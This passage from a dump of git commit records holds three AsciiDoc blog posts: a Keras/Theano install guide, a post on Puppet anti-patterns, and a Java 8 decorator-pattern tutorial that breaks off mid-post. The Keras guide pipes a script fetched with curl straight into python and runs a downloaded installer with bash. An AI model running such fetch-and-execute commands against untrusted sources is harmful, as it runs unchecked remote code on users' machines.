2015-11-10-Visual-Question-Answering-2.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_file":"_posts\/2015-11-10-Visual-Question-Answering-2.adoc","new_contents":"= Visual Question Answering 2\n:hp-tags: VQA, DNN, RNN, CNN, Python, Keras, Theano\n\n\nPrepare for VQA in Ubuntu 14.04 x64. +\nIn this post, I want to install and test Keras. +\n\n\n[quote, Keras Documentation, ]\n____\nKeras is a minimalist, highly modular neural network library in the spirit of Torch, written in Python, that uses Theano under the hood for optimized tensor manipulation on GPU and CPU. It was developed with a focus on enabling fast experimentation.\n____\n \n{empty} +\n\nKeras uses the following dependencies: +\n\n. *numpy*\n. *scipy*\n. *pyyaml*\n. *Theano*\n. *HDF5* and *h5py* (optional, required if you use model saving\/loading functions)\n. Optional but recommended if you use CNNs: *cuDNN*\n\n=== Install miniconda\n\n[source,role=\"console\"]\n----\n$ wget https:\/\/repo.continuum.io\/miniconda\/Miniconda-latest-Linux-`uname -p`.sh\n$ bash Miniconda-latest-Linux-`uname -p`.sh\n$ source ~\/.bashrc\n----\nSee also link:http:\/\/conda.pydata.org\/docs\/install\/quick.html[the install guide].\n\n=== Install Theano\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n=== Install h5py\n\n[source,role=\"console\"]\n----\n$ conda install -y h5py\n----\n\n=== Install Keras\n\n[source,role=\"console\"]\n----\n$ pip install keras\n----\n\n=== Install g++ (optional)\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install g++\n----\n
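\nAfter installing g++, a quick sanity check can confirm that Theano actually picked up a C++ compiler (a hedged aside; theano.config.cxx should print the detected compiler path, or an empty string if none was found):\n\n[source,role=\"console\"]\n----\n$ python -c \"import theano; print(theano.config.cxx)\"\n----\n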
\nWithout g++, you will get this message when running Keras, and Keras will be very slow.\n\n[source,role=\"console\"]\n----\nWARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.\n----\n\n=== Test Keras\n\n[source,role=\"console\"]\n----\n$ curl -sSL https:\/\/github.com\/fchollet\/keras\/raw\/master\/examples\/mnist_mlp.py | python\n----\n\nThe result is shown here.\n\n[source,role=\"console\"]\n----\n60000 train samples\n10000 test samples\nTrain on 60000 samples, validate on 10000 samples\nEpoch 1\/20\n8s - loss: 0.4356 - acc: 0.8716 - val_loss: 0.1863 - val_acc: 0.9421\nEpoch 2\/20\n7s - loss: 0.1961 - acc: 0.9414 - val_loss: 0.1274 - val_acc: 0.9601\nEpoch 3\/20\n7s - loss: 0.1451 - acc: 0.9564 - val_loss: 0.1010 - val_acc: 0.9691\nEpoch 4\/20\n8s - loss: 0.1189 - acc: 0.9642 - val_loss: 0.0847 - val_acc: 0.9752\nEpoch 5\/20\n8s - loss: 0.1019 - acc: 0.9691 - val_loss: 0.0850 - val_acc: 0.9735\nEpoch 6\/20\n8s - loss: 0.0903 - acc: 0.9721 - val_loss: 0.0749 - val_acc: 0.9777\nEpoch 7\/20\n8s - loss: 0.0822 - acc: 0.9745 - val_loss: 0.0753 - val_acc: 0.9762\nEpoch 8\/20\n7s - loss: 0.0758 - acc: 0.9762 - val_loss: 0.0743 - val_acc: 0.9796\nEpoch 9\/20\n7s - loss: 0.0705 - acc: 0.9780 - val_loss: 0.0720 - val_acc: 0.9784\nEpoch 10\/20\n8s - loss: 0.0648 - acc: 0.9790 - val_loss: 0.0688 - val_acc: 0.9793\nEpoch 11\/20\n8s - loss: 0.0592 - acc: 0.9819 - val_loss: 0.0663 - val_acc: 0.9797\nEpoch 12\/20\n8s - loss: 0.0567 - acc: 0.9824 - val_loss: 0.0677 - val_acc: 0.9815\nEpoch 13\/20\n8s - loss: 0.0536 - acc: 0.9833 - val_loss: 0.0711 - val_acc: 0.9796\nEpoch 14\/20\n8s - loss: 0.0520 - acc: 0.9834 - val_loss: 0.0684 - val_acc: 0.9806\nEpoch 15\/20\n9s - loss: 0.0500 - acc: 0.9837 - val_loss: 0.0664 - val_acc: 0.9807\nEpoch 16\/20\n7s - loss: 0.0471 - acc: 0.9850 - val_loss: 0.0683 - val_acc: 0.9809\nEpoch 17\/20\n7s - loss: 0.0449 - acc: 0.9856 - val_loss: 0.0682 - val_acc: 0.9812\nEpoch 18\/20\n8s - loss: 0.0433 - acc: 0.9860 - val_loss: 0.0675 - val_acc: 0.9813\nEpoch 19\/20\n7s - loss: 0.0401 - acc: 0.9869 - val_loss: 0.0683 - val_acc: 0.9819\nEpoch 20\/20\n8s - loss: 0.0383 - acc: 0.9874 - val_loss: 0.0705 - val_acc: 0.9820\nTest score: 0.0704572771238\nTest accuracy: 0.982\n----\n\n{empty} +\n{empty} +\n\n=== Error\n[NOTE]\n===============================\n\nWhen I installed Theano from miniconda,\n\n[source,role=\"console\"]\n----\n$ conda install -y theano\n----\n\n* keras-0.2.0\n* theano-0.7.0\n\nI got this error during the test.\n\n[source,role=\"console\"]\n----\nAttributeError: 'module' object has no attribute 'relu'\n----\n\nI solved the error by re-installing with pip from GitHub. +\n\n[source,role=\"console\"]\n----\n$ conda uninstall theano\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n===============================\n\n{empty} +\n{empty} +\n\n''''\n\n=== References\n\n* http:\/\/ermaker.github.io\/blog\/2015\/09\/08\/get-started-with-keras-for-beginners.html\n* http:\/\/keras.io\/\n* http:\/\/conda.pydata.org\/docs\/install\/quick.html\n\n''''","old_contents":"= Visual Question Answering 2\n:hp-tags: VQA, DNN, RNN, CNN, Python, Keras, Theano\n\n\nPrepare for VQA in Ubuntu 14.04 x64. +\nIn this Post, I want to install and test Keras. +\n\n\n[quote, Keras Documentation, ]\n____\nKeras is a minimalist, highly modular neural network library in the spirit of Torch, written in Python, that uses Theano under the hood for optimized tensor manipulation on GPU and CPU. It was developed with a focus on enabling fast experimentation.\n____\n \n{empty} +\n\nKeras uses the following dependencies: +\n\n. *numpy*\n. *scipy*\n. *pyyaml*\n. *Theano*\n. 
*HDF5* and *h5py* (optional, required if you use model saving\/loading functions)\n. Optional but recommended if you use CNNs: *cuDNN*\n\n=== Install miniconda\n\n[source,role=\"console\"]\n----\n$ wget https:\/\/repo.continuum.io\/miniconda\/Miniconda-latest-Linux-`uname -p`.sh\n$ bash Miniconda-latest-Linux-`uname -p`.sh\n$ source ~\/.bashrc\n----\nSee also link:http:\/\/conda.pydata.org\/docs\/install\/quick.html[the install guide].\n\n=== Install Theano\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n=== Install h5py\n\n[source,role=\"console\"]\n----\n$ conda install -y h5py\n----\n\n=== Install Keras\n\n[source,role=\"console\"]\n----\n$ pip install keras\n----\n\n=== Install g++ (optional)\n\n[source,role=\"console\"]\n----\n$ sudo apt-get install g++\n----\n\nWithout g++, you will get this message when run Keras and Keras will be very slow.\n\n[source,role=\"console\"]\n----\nWARNING (theano.configdefaults): g++ not detected ! Theano will be unable to execute optimized C-implementations (for both CPU and GPU) and will default to Python implementations. Performance will be severely degraded. To remove this warning, set Theano flags cxx to an empty string.\n----\n\n=== Test Keras\n\n[source,role=\"console\"]\n----\n$ curl -sSL https:\/\/github.com\/fchollet\/keras\/raw\/master\/examples\/mnist_mlp.py | python\n----\n\nThe result here.\n\n[source,role=\"console\"]\n----\n60000 train samples\n10000 test samples\nTrain on 60000 samples, validate on 10000 samples\nEpoch 1\/20\n8s - loss: 0.4356 - acc: 0.8716 - val_loss: 0.1863 - val_acc: 0.9421\nEpoch 2\/20\n7s - loss: 0.1961 - acc: 0.9414 - val_loss: 0.1274 - val_acc: 0.9601\nEpoch 3\/20\n7s - loss: 0.1451 - acc: 0.9564 - val_loss: 0.1010 - val_acc: 0.9691\nEpoch 4\/20\n8s - loss: 0.1189 - acc: 0.9642 - val_loss: 0.0847 - val_acc: 0.9752\nEpoch 5\/20\n8s - loss: 0.1019 - acc: 0.9691 - val_loss: 0.0850 - val_acc: 0.9735\nEpoch 6\/20\n8s - loss: 0.0903 - acc: 0.9721 - val_loss: 0.0749 - val_acc: 0.9777\nEpoch 7\/20\n8s - loss: 0.0822 - acc: 0.9745 - val_loss: 0.0753 - val_acc: 0.9762\nEpoch 8\/20\n7s - loss: 0.0758 - acc: 0.9762 - val_loss: 0.0743 - val_acc: 0.9796\nEpoch 9\/20\n7s - loss: 0.0705 - acc: 0.9780 - val_loss: 0.0720 - val_acc: 0.9784\nEpoch 10\/20\n8s - loss: 0.0648 - acc: 0.9790 - val_loss: 0.0688 - val_acc: 0.9793\nEpoch 11\/20\n8s - loss: 0.0592 - acc: 0.9819 - val_loss: 0.0663 - val_acc: 0.9797\nEpoch 12\/20\n8s - loss: 0.0567 - acc: 0.9824 - val_loss: 0.0677 - val_acc: 0.9815\nEpoch 13\/20\n8s - loss: 0.0536 - acc: 0.9833 - val_loss: 0.0711 - val_acc: 0.9796\nEpoch 14\/20\n8s - loss: 0.0520 - acc: 0.9834 - val_loss: 0.0684 - val_acc: 0.9806\nEpoch 15\/20\n9s - loss: 0.0500 - acc: 0.9837 - val_loss: 0.0664 - val_acc: 0.9807\nEpoch 16\/20\n7s - loss: 0.0471 - acc: 0.9850 - val_loss: 0.0683 - val_acc: 0.9809\nEpoch 17\/20\n7s - loss: 0.0449 - acc: 0.9856 - val_loss: 0.0682 - val_acc: 0.9812\nEpoch 18\/20\n8s - loss: 0.0433 - acc: 0.9860 - val_loss: 0.0675 - val_acc: 0.9813\nEpoch 19\/20\n7s - loss: 0.0401 - acc: 0.9869 - val_loss: 0.0683 - val_acc: 0.9819\nEpoch 20\/20\n8s - loss: 0.0383 - acc: 0.9874 - val_loss: 0.0705 - val_acc: 0.9820\nTest score: 0.0704572771238\nTest accuracy: 0.982\n----\n\n{empty} +\n{empty} +\n\n=== Error\n[NOTE]\n===============================\n\nWhen I installed Theano from miniconda, \n\n[source,role=\"console\"]\n----\n$ conda install -y theano\n----\n\n* keras-0.2.0\n* theano-0.7.0\n\ngot this error during th 
test. \n\n[source,role=\"console\"]\n----\nAttributeError: 'module' object has no attribute 'relu'\n----\n\nI solved the error by re-installing with pip from github. +\n\n[source,role=\"console\"]\n----\n$ conda uninstall theano\n$ sudo apt-get install git\n$ pip install git+git:\/\/github.com\/Theano\/Theano.git\n----\n\n===============================\n\n\n\n''''\n\n=== References\n\n* http:\/\/ermaker.github.io\/blog\/2015\/09\/08\/get-started-with-keras-for-beginners.html\n* http:\/\/keras.io\/\n* http:\/\/conda.pydata.org\/docs\/install\/quick.html\n\n''''","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"a1bac63c9253b8dbf5646b3dd4fdf5c246336ddd","subject":"Update 2016-04-23-Puppet-Common-Anti-Patterns.adoc","message":"Update 2016-04-23-Puppet-Common-Anti-Patterns.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-04-23-Puppet-Common-Anti-Patterns.adoc","new_file":"_posts\/2016-04-23-Puppet-Common-Anti-Patterns.adoc","new_contents":"= Puppet - Common Anti-Patterns\n:hp-tags: Puppet, Automation, Configuration Management, Devops\n\nOver my years in the tech industry I've gained a lot of experience with Configuration Management tools such as Puppet, Chef and Ansible. In this post I'd like to share with you my experience, opinions and advice on using Puppet as a Configuration Management tool. Hopefully this helps some of you out there to beat Puppet into submission.\n\n== Everything in Manifests\n\nIn many beginners' tutorials you are taught to put all your code in manifests such as `site.pp` or `nodes.pp`. For example:\n\n```\nnode 'puppetclient1.mydomain.net' {\n include httpd_class\n}\n\nnode 'puppetclient2.mydomain.net' {\n include nginx_class\n file {'\/opt\/deployment_script':\n ensure => 'file',\n owner => 'deploy',\n group => 'deploy',\n mode => '0750'\n }\n}\n\nnode default {\n package { 'perl': \n ensure => present\n }\n}\n```\n\nThis is great when you're just starting out: with a few servers managed, you think you get it. Then you add a few more servers, you start adding more node specific config and before you know it you've got 10'000 lines of hand-crafted artisanal Puppet code. Much of which is probably duplicated. This was common in the early days of Puppet. It was how I started back with Puppet 0.24.\n\nAlthough it's not the best idea to manage your infrastructure in this way, it's actually a reasonably good way to very easily and simply bootstrap cloud instances, with separate manifests based on server type (`web.pp`, `app.pp`, `lb.pp` etc). These can then be applied using https:\/\/cloudinit.readthedocs.io\/en\/latest\/[cloud-init] to create an immutable bootstrapped node.\n
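\nFor illustration only, here is a minimal cloud-init user-data sketch that applies such a manifest on first boot (the manifest path, and the idea of baking the manifest into the image, are assumptions for the example rather than a recommendation):\n\n```\n#cloud-config\npackages:\n - puppet\nruncmd:\n - [puppet, apply, \/etc\/puppet\/manifests\/web.pp]\n```\n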
\n== Monolithic `modules` Directory\n\nQuite often I see repos where either people have `puppet module install`'d straight into the `modules` directory or they've downloaded a module and extracted it there. They then commit the whole repo, including their own modules mixed in with upstream modules, into source control. This pattern has a few problems: you don't know what is a locally developed module and what is an upstream module, and there's no way of easily seeing what versions of modules are deployed. It also adds a lot of extra code to your Puppet repository.\n\nAlthough this way works and you know that your module versions are pinned, there are tools out there that make it much easier to manage your Puppet modules, such as http:\/\/librarian-puppet.com\/[librarian-puppet] and https:\/\/github.com\/puppetlabs\/r10k[r10k].\n
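\nBoth tools drive module installation from a `Puppetfile` that pins each module's source and version. A minimal hedged sketch (the Forge module version and the Git URL are placeholders, not recommendations):\n\n```\nforge 'https:\/\/forgeapi.puppetlabs.com'\n\nmod 'puppetlabs\/stdlib', '4.6.0'\nmod 'profiles',\n  :git => 'git@github.com:myorg\/puppet-profiles.git',\n  :ref => 'master'\n```\n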
\n== Configuration Data in Code\n\nWhen writing Puppet code it's sometimes tempting to hard-code things like IP addresses or node specific things. For example:\n```\nclass profile::base::dns{\n $dns_servers = ['192.168.1.1', '192.168.1.2']\n file { '\/etc\/resolv.conf':\n ensure => present,\n owner => 'root',\n group => 'root',\n mode => '0444',\n content => template('etc\/resolv.conf.erb')\n }\n}\n```\n\nThis works but the code isn't re-usable. If you deploy to a different network or DC are your DNS servers still the same? To improve reusability, change the variable to be a class parameter:\n\n```\nclass profile::base::dns (\n $dns_servers = ['8.8.8.8', '8.8.4.4']\n){\n file { '\/etc\/resolv.conf':\n ensure => present,\n owner => 'root',\n group => 'root',\n mode => '0444',\n content => template('etc\/resolv.conf.erb')\n }\n}\n```\nThen you can specify environment (network, node, DC) specific things in Hiera, using the class's automatic parameter lookup key:\n\n192.168.1.0.yaml:\n```\n---\nprofile::base::dns::dns_servers:\n - '192.168.1.1'\n - '192.168.1.2'\n```\n10.10.0.0.yaml:\n```\n---\nprofile::base::dns::dns_servers:\n - '10.10.0.1'\n - '10.10.1.1'\n```\n\n\n\n\n== Everything in Separate Repos\n\n== Misuse of Puppet Environments\n\n== Manually Deploying Puppet Code","old_contents":"= Puppet - Common Anti-Patterns\n:hp-tags: Puppet, Automation, Configuration Management, Devops\n\nOver my years in the tech industry I've gained a lot of experience with Configuration Managemnt tools such as Puppet, Chef and Ansible. In this post I'd like to share with you my experience opinions and advice on using Puppet as a Configuration Management tool. Hopefully this helps some of you out there to beat Puppet into submission.\n\n== Everything in Manifests\n\nIn many beginners tutorials you get taught to put all your code in manifests such as `site.pp` or `nodes.pp`. For example:\n\n```\nnode 'puppetclient1.mydomain.net' {\n include httpd_class\n}\n\nnode 'puppetclient2.mydomain.net' {\n include nginx_class\n file {'\/opt\/deployment_script':\n ensure => 'file',\n owner => 'deploy',\n group => 'deploy',\n mode => '0750'\n }\n}\n\nnode default {\n package { 'perl': \n ensure => present\n }\n}\n```\n\nThis is great when you're just starting out with a few servers managed you think you get it. Then you add a few more servers, you start adding more node specific config and before you know it you've got 10'000 lines of hand-crafted artisanal Puppet code. Much of which is probably duplicated. This was common in the early deys af Puppet. It was how I started back with Puppet 0.24.\n\nAlthough, it's not the best idea to manage your infrastructure in this way it's actually a reasonably good way to very easily and simply bootstrap cloud instances. with separate manifests based on server type (`web.pp`, `app.pp`, `lb.pp` etc). These can than be applied using https:\/\/cloudinit.readthedocs.io\/en\/latest\/[cloudinit] to create an immutable bootstrapped node.\n\n== Monolithic `modules` Directory\n\nQuite often I see repos where either people have `puppet module install`'d straight into the `modules` directory or they've downloaded a module and extracted it there. They then commit the whole repo including their own modules mixed in with upstream modules into source control. This pattern has a few problems, you don't know what is a locally developed module and what is an upstream module and there's no way of easily seeing what versions of modules are deployed. It also adds a lot of extra code to your Puppet repository.\n\nAlthough this way works and you know that your module versions are pinned, there's tools out there that make it much easier to manage your Puppet modules such as http:\/\/librarian-puppet.com\/[librarian-puppet] and https:\/\/github.com\/puppetlabs\/r10k[r10k].\n\n== Configuration Data in Code\n\n== Everything in Separate Repos\n\n== Misuse of Puppet Environments\n\n== Manually Deploying Puppet Code","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"00d4c49ae2e0289328228ea319e43f6693517f90","subject":"Update 2017-03-21-Pattern-Decorator-en-Java-8.adoc","message":"Update 2017-03-21-Pattern-Decorator-en-Java-8.adoc","repos":"tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io","old_file":"_posts\/2017-03-21-Pattern-Decorator-en-Java-8.adoc","new_file":"_posts\/2017-03-21-Pattern-Decorator-en-Java-8.adoc","new_contents":"= The Decorator Pattern in Java 8\n:published_at: 2017-03-21\n:source-highlighter: highlightjs\n\n== 1) Introduction\n\nThe goal of this article is to discuss one of the well-known GOF (Gang of Four) patterns, the decorator.\nThis design pattern belongs to the behavioural pattern category.\n\nRoughly speaking, the idea of this pattern is to add behaviour to code at runtime (that is, while the code is executing).\nThis pattern has many advantages because, once the design is in place, it becomes very simple to add behaviour to existing code, which makes it very extensible.\n\nBefore Java 8, despite the interesting aspects mentioned above, this pattern was not used much because the code needed to set it up was very verbose.\nIndeed, the code design was based on inheritance, which forced the developer to write an interface for the decorators as well as an abstract class. The verbosity induced by this style of development could discourage quite a few developers.\n\nWith the arrival of lambdas in Java 8, we will show that the decorator is much simpler to implement, less verbose, functional, and more readable for the client of the API.\n\nThe article is split into two parts, showing the code and design of the decorator before and after Java 8. For Java 8 we will show several different techniques.\n\nThe example chosen to illustrate this pattern is the calculation of a company's profit. Each new decorator will add a calculation at runtime to the overall formula.\n\n== 2) Decorator in Java 7\n\nFirst, an interface defining the contract must be created; we will call it ProfitCalculator. 
Here is the code of this interface:\n\n[source,java]\n----\npublic interface ProfitCalculator {\n\n double calculate(double turnover);\n} \n----\n\nA profit calculator has an abstract method \"calculate\", which applies a new calculation to the turnover passed as a parameter.\n\nNext, an abstract class must be created, which we will call AbstractProfitDecorator:\n\n[source,java]\n----\npublic abstract class AbstractProfitDecorator implements ProfitCalculator {\n\n private final ProfitCalculator profitCalculator;\n\n public AbstractProfitDecorator(ProfitCalculator profitCalculator) {\n this.profitCalculator = profitCalculator;\n }\n\n protected abstract double applyExpense(double turnover);\n\n @Override\n public double calculate(double turnover) {\n double profit = profitCalculator.calculate(turnover);\n return applyExpense(profit);\n }\n}\n----\n\nThis class implements the previous interface and must therefore provide the implementation of the \"calculate(double turnover)\" method. \nEach decorator applies an expense by providing an implementation of the \"applyExpense(double turnover)\" method.\n\nThere is a subtlety to note here: the class also takes the \"ProfitCalculator\" interface as a constructor parameter. \nIndeed, each decorator applies the calculation of the decorator that precedes it and then adds its own calculation on top. It is this behaviour that makes it possible to add processing at runtime.\n\nWe will start with a class providing a default calculation, called \"DefaultProfitCalculator\". It is indeed useful to start with a \"ProfitCalculator\" class that depends on nothing when it is instantiated. 
This corresponds to the initial calculation of the decorators:\n\n[source,java]\n----\npublic class DefaultProfitCalculator implements ProfitCalculator {\n\n @Override\n public double calculate(double turnover) {\n return Expenses.getTransportExpenses(turnover);\n }\n}\n----\n\nNext, here is the code of the various decorators:\n\nOperating expenses => OperatingExpensesDecorator:\n[source,java]\n----\npublic class OperatingExpensesDecorator extends AbstractProfitDecorator {\n\n public OperatingExpensesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getOperatingExpenses(turnover);\n }\n}\n----\n\nRemuneration => RemunerationDecorator:\n[source,java]\n----\npublic class RemunerationDecorator extends AbstractProfitDecorator {\n\n public RemunerationDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getRemuneration(turnover);\n }\n}\n----\n\nExceptional expenses => ExceptionalExpensesDecorator:\n[source,java]\n----\npublic class ExceptionalExpensesDecorator extends AbstractProfitDecorator {\n\n public ExceptionalExpensesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getExceptionalExpenses(turnover);\n }\n}\n----\n\nDeductible taxes => DeductibleTaxesDecorator:\n[source,java]\n----\npublic class DeductibleTaxesDecorator extends AbstractProfitDecorator {\n\n public DeductibleTaxesDecorator(ProfitCalculator profitCalculator) {\n super(profitCalculator);\n }\n\n @Override\n protected double applyExpense(double turnover) {\n return Expenses.getDeductibleTaxes(turnover);\n }\n}\n----\n\nThe principle of each decorator is the same: each one must provide an implementation of the \"applyExpense\" method. Note that the chosen cases do not necessarily reflect reality; they just serve as examples. \nA \"garbage class\" called Expenses contains static methods to compute each case. We will show this class a little later.\n\nWe can now move on to the integration tests and to calling the decorators. \n\nThe first test composes all the decorators:\n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecorators_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit =\n new ExceptionalExpensesDecorator(new RemunerationDecorator(new DeductibleTaxesDecorator(new OperatingExpensesDecorator(new DefaultProfitCalculator())))).calculate(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n\nThe calculation runs from right to left: we begin with the DefaultProfitCalculator, then this class is passed as a parameter to the OperatingExpensesDecorator, and so on.\nOperatingExpensesDecorator applies the calculation of DefaultProfitCalculator plus its own.\n
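\nTo make the extensibility concrete, here is a hypothetical extra decorator (the MarketingExpensesDecorator name and the 5000 figure are invented for this illustration); adding a new expense to the chain only requires a new subclass:\n\n[source,java]\n----\npublic class MarketingExpensesDecorator extends AbstractProfitDecorator {\n\n    public MarketingExpensesDecorator(ProfitCalculator profitCalculator) {\n        super(profitCalculator);\n    }\n\n    @Override\n    protected double applyExpense(double turnover) {\n        \/\/ Hypothetical flat marketing budget, for illustration only.\n        return turnover - 5000;\n    }\n}\n----\n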
\nHere is a second test that does not apply all the decorators, and shows that it is very simple to add or remove a decorator at runtime. The code can thus evolve easily:\n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecorators_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = new RemunerationDecorator(new DeductibleTaxesDecorator(new OperatingExpensesDecorator(new DefaultProfitCalculator()))).calculate(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n\nOn the API client side, this confirms that the pattern is interesting to use thanks to its flexibility, and because it is possible to add a new calculation (or, in another context, a new rule) just by creating a new decorator, without breaking the design already in place.\n\nHowever, we can see that setting up this design pattern is very verbose. Many classes and lines of code must be written to put this kind of code design in place. \nMoreover, the fact that it is inheritance-oriented can make it complicated to understand. All of these elements can dissuade developers from adopting this kind of design.\n\nOne example of the use of this pattern in the JDK is the class .....\n\nIn the next part we will see how to redo the decorator pattern in Java 8 with lambdas and functions, and show that the code is much simpler and much less verbose.\n\n== 3) Decorator in Java 8\n\nLet's start by showing the static methods provided by the Expenses garbage class:\n\n[source,java]\n----\npublic class Expenses {\n\n public static double getTransportExpenses(final double turnover) {\n return turnover - 2400;\n }\n\n public static double getOperatingExpenses(final double turnover) {\n return turnover - 15000;\n }\n\n public static double getDeductibleTaxes(final double turnover) {\n return turnover - 3000;\n }\n\n public static double getRemuneration(final double turnover) {\n return turnover - 45000;\n }\n\n public static double getExceptionalExpenses(final double turnover) {\n return turnover - 2000;\n }\n}\n----\n\nEach static method performs the desired calculation, taking a double as a parameter and returning a double as output.\n\nWe will now show different ways to implement this pattern in Java 8.\n\n== a) Decorator in Java 8 with function composition\n\nAs in the Java 7 part, we write a class containing the default calculation:\n\n[source,java]\n----\npublic class DefaultProfitCalculator implements DoubleUnaryOperator {\n\n @Override\n public double applyAsDouble(final double operand) {\n return Expenses.getTransportExpenses(operand);\n }\n}\n----\n\nThis class implements DoubleUnaryOperator, a functional interface provided out of the box in JDK 8. This function takes a double as input and returns a double as output, which matches the signature of the calculations in the Expenses class. The applyAsDouble method is implemented with a default calculation.\n
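\nAs a side note (my own observation, not part of the original design): since DoubleUnaryOperator is a functional interface, the class above could itself be replaced by a simple method reference:\n\n[source,java]\n----\n\/\/ Equivalent to DefaultProfitCalculator, without declaring a class:\nDoubleUnaryOperator defaultCalculator = Expenses::getTransportExpenses;\n----\n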
\nAnd that's all... We can now write our decorator in Java 8, via a test:\n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecoratorsWithAndThen_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = new DefaultProfitCalculator()\n .andThen(Expenses::getOperatingExpenses)\n .andThen(Expenses::getDeductibleTaxes) \n .andThen(Expenses::getRemuneration)\n .andThen(Expenses::getExceptionalExpenses).applyAsDouble(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n\nIsn't that great? We were able to rewrite the decorator pattern with very few lines of code. \nJDK 8 makes it possible to compose several functions together via the \"andThen\" default method. This method is provided on the default functional interfaces offered by the JDK, and DoubleUnaryOperator is one of them.\nWe start from the DefaultProfitCalculator class and, via andThen, compose it with another function. In this example method references were preferred in order to have more concise and expressive code, \"Expenses::getOperatingExpenses\", but lambda expressions would also have done the job, \"e -> Expenses.getOperatingExpenses(e)\".\n\nIt thus becomes very simple to add or remove decorators; in the example below we remove the decorator representing exceptional expenses:\n\n[source,java]\n----\n@Test\n public void givenTurnover_whenNotComposingAllDecoratorsWithAndThen_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = new DefaultProfitCalculator()\n .andThen(Expenses::getOperatingExpenses)\n .andThen(Expenses::getDeductibleTaxes)\n .andThen(Expenses::getRemuneration)\n .applyAsDouble(turnover);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(34600);\n }\n----\n
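\nOne caution worth adding here (an aside of mine, not from the original text): since each decorator changes the running total, the order of composition matters, and \"andThen\" must not be confused with \"compose\", which chains in the opposite direction:\n\n[source,java]\n----\nDoubleUnaryOperator f = x -> x - 100;\nDoubleUnaryOperator g = x -> x * 0.8;\n\nf.andThen(g).applyAsDouble(1000);  \/\/ g(f(1000)) = 720.0\nf.compose(g).applyAsDouble(1000);  \/\/ f(g(1000)) = 700.0\n----\n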
\nIn the following sections, we will see other ways to implement the decorator pattern in Java 8.\n\n== b) Decorator in Java 8 with the Stream API\n\nIn this part, we will see that it is possible to implement the decorator pattern with the Stream API.\nWe create a class called StreamDecorator, a singleton enum (single instance). This class contains a method called calculateProfit that is exposed to the client of the API:\n\n[source,java]\n----\npublic enum StreamDecorator {\n\n \/\/ Single instance.\n INSTANCE;\n\n public double calculateProfit(final double turnover, final DoubleUnaryOperator... operators) {\n return Stream.of(operators).reduce(DoubleUnaryOperator.identity(), DoubleUnaryOperator::andThen)\n .applyAsDouble(turnover);\n }\n}\n----\n\nThe principle here is to pass a series of functions represented by DoubleUnaryOperator instances (equivalent to an array of functions). The method also takes the turnover as a parameter.\nThe Stream API provides a factory method to initialize a Stream from an array. We then use the \"reduce\" method, which reduces the elements of the stream to a single value.\n\nIn functional programming, reduce corresponds to a \"fold\". The principle is to pass two arguments: an initial value (which is also the default) and a function that accumulates elements. With this kind of operator it becomes very simple, for example, to compute the sum of the elements of a list:\n\n[source,java]\n----\nreduce(0, (a, b) -> a + b)\n----\n\nIn this example we consider a and b to be integers. The initial value is 0. The accumulator \"(a, b) -> a + b\" sums the elements of the list as it goes along (it adds the result of the previous iteration to the element of the current iteration). If the structure is empty, the initial value is returned, that is 0.\n\nOur example follows the same principle: the initial function is \"DoubleUnaryOperator.identity()\" and the accumulator is \"DoubleUnaryOperator::andThen\", or \"(ope1, ope2) -> ope1.andThen(ope2)\". As seen previously, at each iteration \"andThen\" composes the previous function with the current one. If the structure is empty, \"DoubleUnaryOperator.identity()\" is returned (in this case a no-op function).\n\nHere is the test code using an example with all the decorators:\n\n[source,java]\n----\n@Test\n public void givenTurnover_whenComposingAllDecoratorsWithStream_thenCorrectResult() {\n\n \/\/ Given.\n final double turnover = 100000;\n\n \/\/ When.\n final double profit = StreamDecorator.INSTANCE.calculateProfit(turnover,\n new DefaultProfitCalculator(), Expenses::getOperatingExpenses, Expenses::getDeductibleTaxes,\n Expenses::getRemuneration, Expenses::getExceptionalExpenses);\n\n \/\/ Then.\n assertThat(profit).isNotNull().isEqualTo(32600);\n }\n----\n
